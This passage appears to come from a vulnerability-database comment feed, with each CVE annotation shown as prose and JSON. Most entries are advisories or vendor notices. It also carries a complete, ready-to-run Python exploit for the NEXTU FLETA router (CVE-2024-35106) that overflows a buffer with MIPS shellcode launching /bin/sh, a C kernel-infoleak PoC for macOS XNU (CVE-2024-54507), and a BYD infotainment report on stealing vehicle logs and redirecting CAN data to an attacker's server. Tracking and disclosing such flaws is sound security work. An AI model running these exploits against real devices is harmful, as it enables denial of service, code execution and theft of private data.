Chrome.**\n2.  **Click the three vertical dots** in the top right corner.\n3.  Go to **Help > About Google Chrome.**\n4.  Chrome will automatically **check for updates** and install the latest version.\n5.  **Relaunch Chrome** to complete the update.\n\n### Related Posts:\n\n*   [New Chrome 0-Day Bug Under Active Attack](https://securityonline.info/cve-2022-4262-chrome-0-day-vulnerability/)\n*   [New WiFi Flaw Leaves All Devices Vulnerable to ‘SSID Confusion’ Attacks](https://securityonline.info/cve-2023-52424-new-wifi-flaw-leaves-all-devices-vulnerable-to-ssid-confusion-attacks/)\n*   [Chrome will no longer flag HTTPS pages as secure sites](https://securityonline.info/chrome-will-no-longer-flag-https-pages-as-secure-sites/)",
   description_format: "markdown",
   vulnerability: "CVE-2025-0291",
   creation_timestamp: "2025-01-08T08:27:43.168816+00:00",
   timestamp: "2025-02-12T06:52:50.539121+00:00",
   related_vulnerabilities: [
      "CVE-2023-52424",
      "CVE-2022-4262",
      "CVE-2025-0291",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

cve-2025-0291

Fortinet Clarification on cve-2024-55591
2 months ago by Alexandre Dulaunoy

UPDATE: Fortinet has informed us that the new CVE-2025-24472 flaw added to FG-IR-24-535 today is not a zero-day and was already fixed in January, but not disclosed then.

Furthermore, even though the current advisory states that the listed flaws were exploited in attacks and includes workarounds, Fortinet says that only CVE-2024-55591, and not CVE-2025-24472.

It appears that this new CVE is for a different pathway to exploiting the bug that was not previously disclosed and was just now added to the Fortinet advisory about the active exploitation of CVE-2024-55591, causing the confusion.

We have updated this previous toot, changed the title of our article, and added an update to prevent confusion.

Ref: https://infosec.exchange/@BleepingComputer/113986777248862223


{
   uuid: "cae05d8f-677d-4f75-9a64-811c17a16d2d",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Fortinet Clarification",
   description: "UPDATE: Fortinet has informed us that the new CVE-2025-24472 flaw added to FG-IR-24-535 today is not a zero-day and was already fixed in January, but not disclosed then.\n\nFurthermore, even though the current advisory states that the listed flaws were exploited in attacks and includes workarounds, Fortinet says that only CVE-2024-55591, and not CVE-2025-24472.\n\nIt appears that this new CVE is for a different pathway to exploiting the bug that was not previously disclosed and was just now added to the Fortinet advisory about the active exploitation of CVE-2024-55591, causing the confusion.\n\nWe have updated this previous toot, changed the title of our article, and added an update to prevent confusion.\n\nRef: https://infosec.exchange/@BleepingComputer/113986777248862223",
   description_format: "markdown",
   vulnerability: "cve-2024-55591",
   creation_timestamp: "2025-02-12T05:40:36.908353+00:00",
   timestamp: "2025-02-12T05:40:36.908353+00:00",
   related_vulnerabilities: [
      "CVE-2024-55591",
      "CVE-2025-24472",
   ],
}

cve-2024-55591

Clarification from Fortinet on cve-2025-24472
2 months ago by Alexandre Dulaunoy

UPDATE: Fortinet has informed us that the new CVE-2025-24472 flaw added to FG-IR-24-535 today is not a zero-day and was already fixed in January, but not disclosed then.

Furthermore, even though the current advisory states that the listed flaws were exploited in attacks and includes workarounds, Fortinet says that only CVE-2024-55591, and not CVE-2025-24472.

It appears that this new CVE is for a different pathway to exploiting the bug that was not previously disclosed and was just now added to the Fortinet advisory about the active exploitation of CVE-2024-55591, causing the confusion.

We have updated this previous toot, changed the title of our article, and added an update to prevent confusion.

Ref: https://infosec.exchange/@BleepingComputer/113986777248862223


{
   uuid: "c2248f9d-e2e0-4af2-a57c-e3b393cffb55",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Clarification from Fortinet",
   description: "UPDATE: Fortinet has informed us that the new CVE-2025-24472 flaw added to FG-IR-24-535 today is not a zero-day and was already fixed in January, but not disclosed then.\n\nFurthermore, even though the current advisory states that the listed flaws were exploited in attacks and includes workarounds, Fortinet says that only CVE-2024-55591, and not CVE-2025-24472.\n\nIt appears that this new CVE is for a different pathway to exploiting the bug that was not previously disclosed and was just now added to the Fortinet advisory about the active exploitation of CVE-2024-55591, causing the confusion.\n\nWe have updated this previous toot, changed the title of our article, and added an update to prevent confusion.\n\nRef: https://infosec.exchange/@BleepingComputer/113986777248862223",
   description_format: "markdown",
   vulnerability: "CVE-2025-24472",
   creation_timestamp: "2025-02-12T05:40:06.836557+00:00",
   timestamp: "2025-02-12T05:40:06.836557+00:00",
   related_vulnerabilities: [
      "CVE-2024-55591",
      "CVE-2025-24472",
   ],
}

cve-2025-24472

From the vendor website: on cve-2025-1143
2 months ago by Koen Van Impe

The M120N Advanced Industrial/In-Vehicle LTE Router is a high performance all-in-one fixed/mobile wireless communications platform with advanced software enabling high availability, reliable and secure connectivity for mission critical applications. The compact, rugged design integrates dual SIMs, four-port Gigabit Switch, Wi-Fi Access Point, embedded multi-GNSS receiver for GPS or GLONASS, and ignition sensing for in-vehicle applications. The M120N is specifically designed to support a wide range of applications in Smart Bus and M2M segments.

Source: https://www.billion.com/Product/communication/M2M-Series/m120n


{
   uuid: "b8a5a61c-b26d-48a8-82e4-67fa23921484",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "From the vendor website:",
   description: "The M120N Advanced Industrial/In-Vehicle LTE Router is a high performance all-in-one fixed/mobile wireless communications platform with advanced software enabling high availability, reliable and secure connectivity for mission critical applications. The compact, rugged design integrates dual SIMs, four-port Gigabit Switch, Wi-Fi Access Point, embedded multi-GNSS receiver for GPS or GLONASS, and ignition sensing for in-vehicle applications. The M120N is specifically designed to support a wide range of applications in Smart Bus and M2M segments.\n\nSource: https://www.billion.com/Product/communication/M2M-Series/m120n",
   description_format: "markdown",
   vulnerability: "CVE-2025-1143",
   creation_timestamp: "2025-02-11T07:41:46.109844+00:00",
   timestamp: "2025-02-11T07:51:08.686930+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=industrialised",
         ],
      },
   ],
}

cve-2025-1143

NEXTU FLETA Wifi6 Router DOS, Potential RCE POC on cve-2024-35106
2 months ago by Cédric Bonhomme

from pwn import *
from hackebds import *


def shutdown_shell_code():
    context.update(arch='mips', os='linux', bits=32, endian='little')

    cmd = "/bin/sh"
    args = ["autoreboot"]

    asmcode = shellcraft.mips.linux.execve(cmd, args, 0) + shellcraft.mips.linux.exit()
    shellcode = asm(asmcode)
    return shellcode


power_off_code = shutdown_shell_code()

gap_code = (b'A') * 0x138

# This is the area that overwrites the RET region. You can place the address to which you want to redirect the execution flow.
# For example I fixed address as 0x7f854710
RET_address = (b'\x10\x47\x85\x7f')
stack_gap = (b'C') * 0x40

print("power_off_code_length")
print(len(power_off_code))

final_code = power_off_code + gap_code + RET_address + stack_gap

import socket
import ssl

# Server Address and Port
HOST = '192.168.1.254'
PORT = 443

# Create an SSL socket for HTTPS connection
context = ssl.create_default_context()
context.set_ciphers('HIGH:!DH:!aNULL')
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE

with socket.create_connection((HOST, PORT)) as sock:
    with context.wrap_socket(sock, server_hostname=HOST) as ssock:
        # Prepare the shellcode as bytes (e.g., b'\x00\x01\x02'; replace with appropriate values for actual use)

        # parameter for evade verification
        send_byte = b"enabled=ON&automaticUplinkSpeed=ON&automaticDownlinkSpeed=ON&addressType=0&ipversion=0&protocol=0&ipStart=192.168.1.5&ipEnd=192.168.1.5&localPortStart=1234&localPortEnd=1234&rmt_ipStart=&rmt_ipEnd=&rmt_portStart=&rmt_portEnd=&l7_protocol=Disable&mode=1&bandwidth=200&bandwidth_downlink=200&remark_dscp=&save_apply=%EC%A0%80%EC%9E%A5+%ED%9B%84+%EC%A0%81%EC%9A%A9&addQosFlag=1&lan_mask=255.255.255.0&submit-url=%2Fip_qos.htm&entry_name=" + final_code

        # POST request headers
        headers = b"POST /boafrm/formIpQoS HTTP/1.1\r\n" \
                  b"Host: " + HOST.encode('utf-8') + b"\r\n" \
                  b"Content-Type: application/octet-stream\r\n" \
                  b"Content-Length: " + str(len(send_byte)).encode('utf-8') + b"\r\nConnection: close\r\n\r\n"

        # Send request (combine headers and body)
        ssock.send(headers + send_byte)

        # Receive response
        response = b""
        while True:
            data = ssock.recv(1024)
            if not data:
                break
            response += data

        # Print response
        print(response.decode('utf-8'))


{
   uuid: "8b27e542-2740-435c-9317-55790ef4965b",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "NEXTU FLETA Wifi6 Router DOS, Potential RCE POC",
   description: "```python\nfrom pwn import *  \nfrom hackebds import *  \n  \n  \ndef shutdown_shell_code():  \n    context.update(arch='mips', os='linux', bits=32, endian='little')  \n  \n    cmd = \"/bin/sh\"  \n    args = [\"autoreboot\"]  \n  \n    asmcode = shellcraft.mips.linux.execve(cmd, args, 0) + shellcraft.mips.linux.exit()  \n    shellcode = asm(asmcode)  \n    return shellcode  \n  \n  \npower_off_code = shutdown_shell_code()  \n  \ngap_code = (b'A') * 0x138\n\n# This is the area that overwrites the RET region. You can place the address to which you want to redirect the execution flow.\n# For example I fixed address as 0x7f854710\nRET_address = (b'\\x10\\x47\\x85\\x7f')  \nstack_gap = (b'C') * 0x40  \n  \nprint(\"power_off_code_length\")  \nprint(len(power_off_code))  \n  \nfinal_code = power_off_code + gap_code + RET_address + stack_gap  \n  \nimport socket  \nimport ssl  \n  \n# Server Address and Port  \nHOST = '192.168.1.254'  \nPORT = 443  \n  \n# Create an SSL socket for HTTPS connection\ncontext = ssl.create_default_context()  \ncontext.set_ciphers('HIGH:!DH:!aNULL')  \ncontext.check_hostname = False  \ncontext.verify_mode = ssl.CERT_NONE  \n  \nwith socket.create_connection((HOST, PORT)) as sock:  \n    with context.wrap_socket(sock, server_hostname=HOST) as ssock:  \n            # Prepare the shellcode as bytes (e.g., b'\\x00\\x01\\x02'; replace with appropriate values for actual use)\n  \n        # parameter for evade verification  \n        send_byte = b\"enabled=ON&automaticUplinkSpeed=ON&automaticDownlinkSpeed=ON&addressType=0&ipversion=0&protocol=0&ipStart=192.168.1.5&ipEnd=192.168.1.5&localPortStart=1234&localPortEnd=1234&rmt_ipStart=&rmt_ipEnd=&rmt_portStart=&rmt_portEnd=&l7_protocol=Disable&mode=1&bandwidth=200&bandwidth_downlink=200&remark_dscp=&save_apply=%EC%A0%80%EC%9E%A5+%ED%9B%84+%EC%A0%81%EC%9A%A9&addQosFlag=1&lan_mask=255.255.255.0&submit-url=%2Fip_qos.htm&entry_name=\" + final_code  \n  \n        # POST request headers \n        headers = b\"POST /boafrm/formIpQoS HTTP/1.1\\r\\n\" \\  \n                  b\"Host: \" + HOST.encode('utf-8') + b\"\\r\\n\" \\  \n                                                     b\"Content-Type: application/octet-stream\\r\\n\" \\  \n                                                     b\"Content-Length: \" + str(len(send_byte)).encode(  \n            'utf-8') + b\"\\r\\nConnection: close\\r\\n\\r\\n\"  \n  \n        # Send request (combine headers and body)  \n        ssock.send(headers + send_byte)  \n  \n        # Receive response  \n        response = b\"\"  \n        while True:  \n            data = ssock.recv(1024)  \n            if not data:  \n                break  \n            response += data  \n  \n            #Print response  \n        print(response.decode('utf-8'))\n```",
   description_format: "markdown",
   vulnerability: "CVE-2024-35106",
   creation_timestamp: "2025-02-07T03:41:54.937264+00:00",
   timestamp: "2025-02-07T03:41:54.937264+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         ref: [
            "https://github.com/laskdjlaskdj12/CVE-2024-35106-POC",
         ],
      },
   ],
}

cve-2024-35106

PoC - AMD EPYC 7B13 64-Core Processor (Milan) and AMD Ryzen 9 7940HS w/ Radeon 780M Graphics (Phoenix). on cve-2024-56161
2 months ago by Alexandre Dulaunoy

We've provided these PoCs to demonstrate that this vulnerability allows an adversary to produce arbitrary microcode patches. They cause the RDRAND instruction to always return the constant 4, but also set the carry flag (CF) to 0 to indicate that the returned value is invalid. Because correct use of the RDRAND instruction requires checking that CF is 1, this PoC can not be used to compromise correctly functioning confidential computing workloads. Additional tools and resources will be made public on March 5.


{
   uuid: "4479dea7-72fb-4d91-90f4-95ffec3e0310",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "PoC - AMD EPYC 7B13 64-Core Processor (Milan) and AMD Ryzen 9 7940HS w/ Radeon 780M Graphics (Phoenix).",
   description: "- [PoC Tested on AMD EPYC 7B13 64-Core Processor (Milan) and AMD Ryzen 9 7940HS w/ Radeon 780M Graphics (Phoenix).](https://github.com/google/security-research/tree/master/pocs/cpus/entrysign)\n\nWe've provided these PoCs to demonstrate that this vulnerability allows an adversary to produce arbitrary microcode patches. They cause the RDRAND instruction to always return the constant 4, but also set the carry flag (CF) to 0 to indicate that the returned value is invalid. Because correct use of the RDRAND instruction requires checking that CF is 1, this PoC can not be used to compromise correctly functioning confidential computing workloads. Additional tools and resources will be made public on March 5.",
   description_format: "markdown",
   vulnerability: "CVE-2024-56161",
   creation_timestamp: "2025-02-05T07:30:51.031707+00:00",
   timestamp: "2025-02-05T07:31:30.100378+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:information=PoC",
         ],
      },
   ],
}

cve-2024-56161

A vulnerability report for BYD (Chinese car maker) on cve-2024-54728
2 months ago by Cédric Bonhomme

Vulnerability Report - BYD QIN PLUS DM-i - Dilink OS - Incorrect Access Control

Product: BYD QIN PLUS DM-i - Dilink OS

Vendor: https://www.byd.com/

Version: 3.0_13.1.7.2204050.1.

Vulnerability Type: Incorrect Access Control

Attack Vectors: The user installs and runs an app on the IVI system that only requires normal permissions.

Introduction

The BYD QIN PLUS DM-i with Dilink OS contains an Incorrect Access Control vulnerability. Attackers can bypass permission restrictions and obtain confidential vehicle data through Attack Path 1: System Log Theft and Attack Path 2: CAN Traffic Hijacking.

Attack Path 1 : System Log Theft

Incorrect access control in BYD QIN PLUS DM-i Dilink OS 3.0_13.1.7.2204050.1 allows unauthorized attackers to access system logcat logs.

Description

The DiLink 3.0 system’s /system/bin/app_process64 process logs system logcat data, storing it in zip files in the /sdcard/logs folder. These logs are accessible by regular apps, allowing them to bypass restrictions, escalate privileges, and potentially copy and upload sensitive vehicle data (e.g., location, fuel/energy consumption, VIN, mileage) to an attacker’s server. This poses a serious security risk, as the data is highly confidential for both users and manufacturers.

Detailed Steps

  1. Check the system-collected and stored system logs.

[image: log.png]

  2. The malicious app copies system files to its own private directory. The main code is as follows:

[image]

  3. The malicious app successfully steals system logs to its private directory.

[image]

  4. Extract the file and search for sensitive confidential information in the system logs.

  (a) Fuel consumption, energy consumption, and seatbelt status.

[image: 111.png]

  (b) ICCID, VIN (Vehicle Identification Number), and model code.

[image: vin.png]

  (c) Diagnostic command format.

[image]

  (d) Various detailed vehicle status information.

[image]

Ethical Considerations

The vulnerability has been reported to the manufacturer and confirmed. It has been addressed and fixed in the latest versions, with the logs now encrypted.

Additional Notes

Our vulnerability discovery was conducted on a standalone in-vehicle system, and due to the absence of a real vehicle, the logs collected by the system were quite limited. In a real vehicle, we expect to collect a much richer and larger volume of logs. Due to device limitations, we were unable to conduct further verification. Additionally, only one version of the in-vehicle system was tested, but other versions may also contain the same vulnerability, with the actual impact potentially being more severe.

Disclaimer

This vulnerability report is intended solely for informational purposes and must not be used for malicious activities. The author disclaims any responsibility for the misuse of the information provided.

Attack Path 2 : CAN Traffic Hijacking

The attacker can remotely intercept the vehicle's CAN traffic, which is supposed to be sent to the manufacturer's cloud server, and potentially use this data to infer the vehicle's status.

Description

In the DiLink 3.0 system, the /system/priv-app/CanDataCollect folder is accessible to regular users, allowing them to extract CanDataCollect.apk and analyze its code. The "com.byd.data_collection_notify" broadcast, not protected by the system, lets apps set the CAN traffic upload URL. This enables attackers to:

  1. Set the upload URL to null, preventing cloud data collection.
  2. Set the upload URL to an attacker’s domain for remote CAN traffic collection.

Additionally, the encoded upload files can be decrypted using reverse-engineered decoding functions, enabling attackers to remotely analyze CAN traffic and infer the vehicle's status.

Detailed Steps

  1. The vulnerability code for the broadcast handling in CanDataCollect.apk.

[image]

  2. The exploitation code for the malicious app vulnerability.

[image]

  3. The malicious app successfully modifies the uploaded CAN traffic URL.

[image]

  4. After the attack on the IVI system, the logcat logs route CAN traffic to the attacker’s server.

[image]

  5. The CAN traffic collected by the attacker and the decoded results.

[image]

Ethical Considerations

The vulnerability has been reported to the manufacturer and confirmed. It has been addressed and fixed in the latest versions.

Additional Notes

Our vulnerability discovery was conducted on a standalone in-vehicle system, and due to the absence of a real vehicle, the logs collected by the system were quite limited. In a real vehicle, we expect to collect a much richer and larger volume of logs. Due to device limitations, we were unable to conduct further verification. Additionally, only one version of the in-vehicle system was tested, but other versions may also contain the same vulnerability, with the actual impact potentially being more severe.

Disclaimer

This vulnerability report is intended solely for informational purposes and must not be used for malicious activities. The author disclaims any responsibility for the misuse of the information provided.


{
   uuid: "21f63dda-f998-4c51-b7ce-6efc09015c56",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "A vulnerability report for BYD (Chinese car maker)",
   description: "\n# Vulnerability Report - BYD QIN PLUS DM-i - Dilink OS - Incorrect Access Control\n\n**Product:** BYD QIN PLUS DM-i - Dilink OS\n\n**Vendor**: https://www.byd.com/\n\n**Version**:  3.0_13.1.7.2204050.1.\n\n**Vulnerability Type:** Incorrect Access Control\n\n**Attack Vectors**: The user installs and runs an app on the IVI system that only requires normal permissions.\n\n## Introduction\n\n​\tThe BYD QIN PLUS DM-i with Dilink OS contains an Incorrect Access Control vulnerability. Attackers can bypass permission restrictions and obtain confidential vehicle data through **Attack Path 1**: **System Log Theft** and **Attack Path 2**: **CAN Traffic Hijacking**.\n\n## Attack Path 1 : System Log Theft\n\n​\tIncorrect access control in BYD QIN PLUS DM-i Dilink OS  3.0_13.1.7.2204050.1 allows unaithorized attackers to access system  logcat logs.\n\n### Description\n\n​\tThe DiLink 3.0 system’s /system/bin/app_process64 process logs system logcat data, storing it in zip files in the /sdcard/logs folder. These logs are accessible by regular apps, allowing them to bypass restrictions, escalate privileges, and potentially copy and upload sensitive vehicle data (e.g., location, fuel/energy consumption, VIN, mileage) to an attacker’s server. This poses a serious security risk, as the data is highly confidential for both users and manufacturers.\n\n### Detailed Steps\n\n1. Check the system-collected and stored system logs.\n\n![log.png](https://s2.loli.net/2025/01/26/MRTCqKnv1aEIpQZ.png)\n\n2. The malicious app copies system files to its own private directory. The main code is as follows:\n\n<img src=\"https://s2.loli.net/2025/01/26/EqxHDSX9O5Ibhr4.png\" alt=\".png\" style=\"zoom: 50%;\" />\n\n3. The malicious app successfully steals system logs to its private directory.\n\n   ![.png](https://s2.loli.net/2025/01/26/r7vsY93LgTb6coF.png)\n\n4. 
Extract the file and search for sensitive confidential information in the system logs.\n\n​\t\t(a) Fuel consumption, energy consumption, and seatbelt status.\n\n![111.png](https://s2.loli.net/2025/01/26/6jkmACTRwxaX7sb.png)\n\n​\t\t(b) ICCID, VIN (Vehicle Identification Number), and model code.\n\n![vin.png](https://s2.loli.net/2025/01/26/nJWl3fq5QKVNuEx.png)\n\n​\t\t(c) Diagnostic command format.\n\n![.png](https://s2.loli.net/2025/01/26/jc3xCTkUd8a4ZF2.png)\n\n​\t\t(d) Various detailed vehicle status information.\n\n![.png](https://s2.loli.net/2025/01/26/lSTFK7thceQJ16b.png)\n\n### **Ethical Considerations**\n\n​\tThe vulnerability has been reported to the manufacturer and confirmed. It has been addressed and fixed in in the latest versions, with the logs now encrypted.\n\n### Additional Notes\n\n​\tOur vulnerability discovery was conducted on a standalone in-vehicle system, and due to the absence of a real vehicle, the logs collected by the system were quite limited. In a real vehicle, we expect to collect a much richer and larger volume of logs. Due to device limitations, we were unable to conduct further verification. Additionally, only one version of the in-vehicle system was tested, but other versions may also contain the same vulnerability, with the actual impact potentially being more severe.\n\n### Disclaimer\n\n​\tThis vulnerability report is intended solely for informational purposes and must not be used for malicious activities. The author disclaims any responsibility for the misuse of the information provided.\n\n\n\n## Attack Path 2 : CAN Traffic Hijacking\n\n​\tThe attacker can remotely intercept the vehicle's CAN traffic, which is supposed to be sent to the manufacturer's cloud server, and potentially use this data to infer the vehicle's status.\n\n### Description\n\n​\tIn the DiLink 3.0 system, the /system/priv-app/CanDataCollect folder is accessible to regular users, allowing them to extract CanDataCollect.apk and analyze its code. 
The \"com.byd.data_collection_notify\" broadcast, not protected by the system, lets apps set the CAN traffic upload URL. This enables attackers to:\n\n1. Set the upload URL to null, preventing cloud data collection.\n2. Set the upload URL to an attacker’s domain for remote CAN traffic collection.\n\n​\tAdditionally, the encoded upload files can be decrypted using reverse-engineered decoding functions, enabling attackers to remotely analyze CAN traffic and infer the vehicle's status.\n\n### Detailed Steps\n\n1. The vulnerability code for the broadcast handling in CanDataCollect.apk.\n\n<img src=\"https://s2.loli.net/2025/01/26/RanvVwJZYUuq9i8.png\" alt=\".png\" style=\"zoom:50%;\" />\n\n2. The exploitation code for the malicious app vulnerability.\n\n<img src=\"https://s2.loli.net/2025/01/26/QBC8cxEkKtuY5XT.png\" alt=\".png\" style=\"zoom:50%;\" />\n\n3. The malicious app successfully modifies the uploaded CAN traffic URL.\n\n![.png](https://s2.loli.net/2025/01/26/sugvP14iSFrAhHW.png)\n\n4. After the attack on the IVI system, the logcat logs route CAN traffic to the attacker’s server.\n\n<img src=\"https://s2.loli.net/2025/01/26/2Cxtc3UvFe9X7pn.png\" alt=\".png\" style=\"zoom: 50%;\" />\n\n5. The CAN traffic collected by the attacker and the decoded results.\n\n<img src=\"https://s2.loli.net/2025/01/27/YqinPrht6S8CFBW.png\" alt=\".png\" style=\"zoom:50%;\" />\n\n### **Ethical Considerations**\n\n​\tThe vulnerability has been reported to the manufacturer and confirmed. It has been addressed and fixed in the latest versions.\n\n### Additional Notes:\n\n​\tOur vulnerability discovery was conducted on a standalone in-vehicle system, and due to the absence of a real vehicle, the logs collected by the system were quite limited. In a real vehicle, we expect to collect a much richer and larger volume of logs. Due to device limitations, we were unable to conduct further verification. 
Additionally, only one version of the in-vehicle system was tested, but other versions may also contain the same vulnerability, with the actual impact potentially being more severe.\n\n### Disclaimer\n\n​\tThis vulnerability report is intended solely for informational purposes and must not be used for malicious activities. The author disclaims any responsibility for the misuse of the information provided.",
   description_format: "markdown",
   vulnerability: "CVE-2024-54728",
   creation_timestamp: "2025-01-26T17:57:50.934368+00:00",
   timestamp: "2025-01-26T17:57:50.934368+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
      {
         ref: [
            "https://gist.github.com/xu-yanbo202000460009/00dacd7bfede713a0f052a531da4fabd",
         ],
      },
   ],
}

cve-2024-54728

Yealink informs that the SIP-T46S has been discontinued since 2022-03-31 on cve-2019-14656
2 months ago by Cédric Bonhomme

""" Dear Customers,

Yealink hereby informs you that the SIP-T46S has been discontinued since 2022-03-31. After the date, new orders for the product would not be accepted.

After the End-of-Life date, Yealink will not pursue any new feature development on SIP-T46S, but we will follow the industry standard practices regarding software support of the discontinued (EOL) products. Consistent with such standards, Yealink will continue to offer support and after-sale service.

The general policy guidelines are:

(1) For the first year from the End of Life date, Yealink will offer full support, including HW/SW Technical Support, Apply Existing SW Bug Fixes, New Non-Critical SW Bug Fixes, New Critical SW Bug Fixes and New Security Fixes.

(2) For the second year till, and including, the fifth year from the End of Life, Yealink will attempt to provide SW bug fixes. In the EOL support phase, a SW upgrade of the product to a newer existing release will also be seen as a fix to the SW bug. Providing a fix may not be possible in some cases due to the limitation of hardware or software architecture, and Yealink in its sole discretion will determine what fixes, if any, will be provided.

(3) Yealink will not offer any New Features/Enhancements support from the End of Life.

(4) Spares or replacement parts for hardware will be available depending on your local distributors. Please contact your local Yealink distributors for HW Technical Support and HW Repair and Return (subject to inventory availability). The local Yealink distributors will provide you the corresponding HW support in accordance with Yealink Return Materials Authorization (RMA) process.

(5) Since the sixth year from the End of Life, Yealink will not offer any Support. """


{
   uuid: "b66f6073-c25f-43da-a3ab-4d70b3c8933b",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Yealink informs that the SIP-T46S has been discontinued since 2022-03-31",
   description: "\"\"\"\nDear Customers,\n\n\nYealink hereby informs you that the SIP-T46S has been discontinued since 2022-03-31. After the date, new orders for the product would not be accepted.\n\n\nAfter the End-of-Life date, Yealink will not pursue any new feature development on SIP-T46S, but we will follow the industry standard practices regarding software support of the discontinued (EOL) products. Consistent with such standards, Yealink will continue to offer support and after-sale service.\n\n\nThe general policy guidelines are:\n\n\n(1) For the first year from the End of Life date, Yealink will offer full support, including HW/SW Technical Support, Apply Existing SW Bug Fixes, New Non-Critical SW Bug Fixes, New Critical SW Bug Fixes and New Security Fixes.\n\n\n(2) For the second year till, and including, the fifth year from the End of Life, Yealink will attempt to provide SW bug fixes. In the EOL support phase, a SW upgrade of the product to a newer existing release will also be seen as a fix to the SW bug. Providing a fix may not be possible in some cases due to the limitation of hardware or software architecture, and Yealink in its sole discretion will determine what fixes, if any, will be provided.\n\n\n(3) Yealink will not offer any New Features/Enhancements support from the End of Life.\n\n\n(4) Spares or replacement parts for hardware will be available depending on your local distributors. Please contact your local Yealink distributors for HW Technical Support and HW Repair and Return (subject to inventory availability). The local Yealink distributors will provide you the corresponding HW support in accordance with Yealink Return Materials Authorization (RMA) process.\n\n\n(5) Since the sixth year from the End of Life, Yealink will not offer any Support.\n\"\"\"",
   description_format: "markdown",
   vulnerability: "cve-2019-14656",
   creation_timestamp: "2025-01-24T10:18:50.387271+00:00",
   timestamp: "2025-01-24T10:18:50.387271+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
      {
         ref: [
            "https://www.yealink.com/en/product-detail/ip-phone-t46s",
         ],
      },
   ],
}

cve-2019-14656

Proof Of Concept on cve-2024-54507
2 months ago by Cédric Bonhomme

// ravi (@0xjprx)
// 2-byte kernel infoleak, introduced in xnu-11215.1.10.
// gcc SUSCTL.c -o susctl
// ./susctl
#include <stdint.h>
#include <stdio.h>
#include <sys/sysctl.h>

void leak() {
    // Oversized, zeroed receive buffer: only bytes the kernel actually writes
    // end up non-zero, so the leaked bytes are easy to pick out.
    uint64_t val = 0;
    size_t len = sizeof(val);
    if (sysctlbyname("net.inet.udp.log.remote_port_excluded", &val, &len, NULL, 0) != 0) {
        perror("sysctlbyname");
        return;
    }
    // Bytes 2 and 3 of the returned value are the two leaked kernel bytes.
    printf("leaked: 0x%llX 0x%llX\n",
           (unsigned long long)((val >> 16) & 0x0FF),
           (unsigned long long)((val >> 24) & 0x0FF));
}

int main() {
    leak();
    return 0;
}

from https://github.com/jprx/CVE-2024-54507


{
   uuid: "25c99b1c-5ba6-4c88-bac6-3ad6c5e525b4",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Proof Of Concept",
   description: "```c\n// ravi (@0xjprx)\n// 2-byte kernel infoleak, introduced in xnu-11215.1.10.\n// gcc SUSCTL.c -o susctl\n// ./susctl\n#include <stdio.h>\n#include <sys/sysctl.h>\n\nvoid leak() {\n    uint64_t val = 0;\n    size_t len = sizeof(val);\n    sysctlbyname(\"net.inet.udp.log.remote_port_excluded\", &val, &len, NULL, 0);\n    printf(\"leaked: 0x%llX 0x%llX\\n\", (val >> 16) & 0x0FF, (val >> 24) & 0x0FF);\n}\n\nint main() {\n    leak();\n    return 0;\n}\n```\n\nfrom https://github.com/jprx/CVE-2024-54507",
   description_format: "markdown",
   vulnerability: "CVE-2024-54507",
   creation_timestamp: "2025-01-24T06:21:59.299861+00:00",
   timestamp: "2025-01-24T06:32:36.489951+00:00",
   related_vulnerabilities: [
      "CVE-2024-54507",
   ],
   meta: [
      {
         ref: [
            "https://github.com/jprx/CVE-2024-54507",
            "https://jprx.io/cve-2024-54507/",
         ],
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
   ],
}

cve-2024-54507
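The PoC above reads into an 8-byte buffer and keeps bytes 2 and 3, which is the shape a sysctl handler produces when it copies out more bytes than its backing variable holds. The following C example is added here and is neither jprx's code nor XNU code: it is a user-space model of that bug class with a hardened handler beside it, and a reader that mirrors the PoC's extraction. The struct layout, the neighbouring bytes and the handler names are constructed for illustration only; the actual root cause in XNU is in the linked write-up.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the kernel side: a 16-bit tunable followed in memory
 * by bytes user space must never see. Names and layout are hypothetical. */
struct kernel_data {
    uint16_t remote_port_excluded;   /* the sysctl's backing variable */
    uint8_t  neighbour[6];           /* whatever happens to follow it */
};

static struct kernel_data kdata = {
    .remote_port_excluded = 1,
    .neighbour = { 0x41, 0x42, 0xC0, 0xDE, 0xAA, 0xBB },
};

/* Buggy handler (model): treats the 16-bit variable as an int and copies
 * sizeof(int) bytes, so the two bytes after it reach user space. Returns
 * the number of bytes written to ubuf. */
size_t sysctl_copyout_buggy(void *ubuf, size_t ulen) {
    size_t n = sizeof(int);
    if (ulen < n)
        return 0;
    memcpy(ubuf, &kdata, n);     /* reads past remote_port_excluded */
    return n;
}

/* Fixed handler (model): widen the value into a correctly typed local and
 * copy only that, so nothing adjacent is exposed. */
size_t sysctl_copyout_fixed(void *ubuf, size_t ulen) {
    int value = kdata.remote_port_excluded;
    size_t n = sizeof(value);
    if (ulen < n)
        return 0;
    memcpy(ubuf, &value, n);
    return n;
}

/* User-space side, mirroring the PoC: read into a zeroed uint64_t and return
 * bytes 2 and 3 (little-endian, as on every Apple platform). Zero means
 * nothing leaked. */
uint16_t leaked_bytes(size_t (*handler)(void *, size_t)) {
    uint64_t val = 0;
    handler(&val, sizeof(val));
    return (uint16_t)(((val >> 16) & 0xFF) | (((val >> 24) & 0xFF) << 8));
}

int main(void) {
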